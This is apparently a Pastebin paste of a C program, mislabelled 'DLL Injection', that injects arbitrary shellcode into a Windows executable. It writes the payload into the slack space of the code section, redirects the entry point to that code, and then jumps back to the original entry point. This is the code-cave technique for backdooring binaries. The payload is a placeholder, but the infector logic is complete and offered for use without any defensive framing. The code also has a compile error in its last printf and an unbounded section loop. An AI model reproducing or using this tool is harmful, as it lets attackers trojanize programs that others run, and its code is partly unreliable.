Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

DLL Injection

By: Noteworthy on Jul 29th, 2013  |  syntax: C++  |  size: 3.08 KB  |  views: 150  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. /* ============================================================
  2.  
  3.         PE File Injection
  4.     (C) Raashid Bhat 2012
  5.    
  6. */
  7.  
  8. #define WIN32_LEAN_AND_MEAN // skip unnecessay includes
  9. #include<windows.h>
  10. #include<winNT.h> // struct definitions for Portable executable file
  11. #include<stdio.h>
  12. #include<stdlib.h>
  13.  
  14. unsigned char buf[] = "\xde\xad\xbe\xef"; // Your Assmebly Code here
  15.  
  16. unsigned char uSeq[] = "\xB8\xFF\xBE\xAD\xDE\xFF\xE0";    // MOV EAX,0xdeadbeef; JMP EAX  JMP back to Original Entry Point
  17.  
  18. void usage(char *pName)
  19. {
  20. printf("\n%s <exe_name>", pName);
  21. return;
  22. }
  23.  
  24. int main(int argc, char **argv)
  25. {
  26. short iSection = 0;
  27. unsigned int iDelta = 0;
  28. DWORD iPos = 0;
  29. int a = 0;
  30. unsigned  char * pSectionData ;
  31.  
  32.     FILE *fp = NULL;
  33.  
  34. PIMAGE_DOS_HEADER sDosHeader = (PIMAGE_DOS_HEADER) malloc(sizeof(IMAGE_DOS_HEADER)); // DOS Header defined in Winnt.h
  35. PIMAGE_NT_HEADERS32 sPEHeader = (PIMAGE_NT_HEADERS32) malloc(sizeof(IMAGE_NT_HEADERS32));
  36. PIMAGE_SECTION_HEADER sSection = NULL, tmp; // keep as null, later allocate on the based of iSections
  37.  
  38. if (argc != 2)
  39. {
  40.     usage(argv[0]);
  41.     exit(EXIT_FAILURE);
  42. }
  43. fp = fopen(argv[1], "r+b");
  44. if (!sDosHeader)
  45. {
  46.     printf("%s","Cannot allocate memory");
  47.     exit(-1);
  48. }
  49.  
  50.     fread(sDosHeader, sizeof(IMAGE_DOS_HEADER), 1, fp);
  51.  
  52.     if (sDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
  53. {
  54.     printf("%s", "Not a valid PE image");
  55.     exit(EXIT_FAILURE);
  56. }
  57.  
  58. fseek(fp, sDosHeader->e_lfanew, SEEK_SET);
  59.  
  60.     fread(sPEHeader, sizeof(IMAGE_NT_HEADERS32), 1, fp);
  61.  
  62.     sSection = (PIMAGE_SECTION_HEADER) malloc(sizeof(IMAGE_SECTION_HEADER) * sPEHeader->FileHeader.NumberOfSections);
  63.  
  64.     fread(sSection, sizeof(IMAGE_SECTION_HEADER) * sPEHeader->FileHeader.NumberOfSections, 1, fp);
  65.  
  66.     printf("no of sections in PE %d\n", sPEHeader->FileHeader.NumberOfSections);
  67.  
  68. while(1)
  69. {
  70.     if (sSection->VirtualAddress == sPEHeader->OptionalHeader.BaseOfCode) // look for the code section
  71.     {
  72.  
  73.             break;
  74.     }
  75.  
  76.         sSection += 1;
  77.  
  78.     }
  79.  
  80.        
  81. iDelta = sSection->SizeOfRawData;
  82.  
  83. pSectionData =  (unsigned char*) malloc(sizeof(unsigned char) * iDelta );
  84.    
  85. fseek(fp, sSection->PointerToRawData + sSection->Misc.VirtualSize , SEEK_SET);
  86.  
  87. iPos = sSection->Misc.VirtualSize + sPEHeader->OptionalHeader.BaseOfCode;
  88.  
  89. if( iDelta - sSection->Misc.VirtualSize< sizeof(buf))
  90. {
  91.     printf("%s", "Cannot Inject Code");
  92.     exit(EXIT_FAILURE);
  93. }
  94. fwrite(buf, sizeof(buf) - 1, 1, fp); // Write Bytes to Executable File
  95. a = sPEHeader->OptionalHeader.AddressOfEntryPoint + sPEHeader->OptionalHeader.ImageBase;
  96.  
  97. memcpy(&uSeq[1]  , &a, sizeof(DWORD));
  98.  
  99. fwrite(    uSeq, sizeof(uSeq), 1, fp);
  100.  
  101. /* rewind back and change AddressOfEntrypoint to make Executable's EP to our injected code */
  102.  
  103. rewind(fp);
  104. fseek(fp, sDosHeader->e_lfanew, SEEK_SET);
  105. sPEHeader->OptionalHeader.AddressOfEntryPoint = iPos;
  106. fwrite(    sPEHeader, sizeof(IMAGE_NT_HEADERS32), 1, fp);
  107.  
  108. printf("%s %s" , "Code Injected in file " argv[1]);
  109.  
  110. free(sDosHeader);
  111. free(sPEHeader);
  112. free(sSection);
  113.  
  114.     fclose(fp);
  115.  
  116. return 0;
  117. }